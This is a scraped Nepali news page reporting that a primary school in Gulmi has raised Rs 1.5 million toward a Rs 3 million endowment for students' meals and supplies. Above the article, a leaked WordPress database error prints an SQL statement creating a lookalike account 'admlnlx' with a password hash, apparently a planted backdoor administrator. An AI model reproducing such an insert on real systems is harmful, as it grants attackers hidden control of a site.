WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B4yWzTLpousXIqDuC0MMJ7KITeqGVS1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 00:41:49', '', 'admlnlx', 'admlnlx')
गुल्मी, पुस ११ –
गुल्मीको एक विद्यालयले अक्षयकोष स्थापनाको लागि आर्थिक सङ्कलन अभियानलाई तीव्रता दिएको छ ।
कुर्घा गाविस–७ गुर्जाङमा रहेको खड्कदेवी प्राथमिक विद्यालयले सञ्चालन गरेको अभियानबाट हालसम्म स्वदेश तथा विदेशमा रहेका विभिन्न व्यक्तिबाट कुल रु १५ लाख सङ्कलन भएको विद्यालयका प्रधानाध्यापक कुलराज शर्माले जानकारी दिनुभयो ।
विद्यार्थीको लागि निःशुल्क रुपमा दिवा खाजा, पोसाक र कपि कलमको सुविधा र सहयोग गर्ने लक्ष्यसहित विद्यालयले रु ३० लाखको अक्षयकोष स्थापना गरी विद्यार्थीलाई सुविधा प्रदान गर्ने उद्देश्यका साथ अभियान सञ्चालन गरिएको हो ।
प्रधानाध्यापक शर्माले सानो विद्यालय भएर पनि यस्तो कार्य जिल्लामा कहीँकतै आफूले नसुनेको र नदेखेको हँुदा यो जिल्लाकै नमुना कार्य भएको दाबी गर्नुभयो । – रासस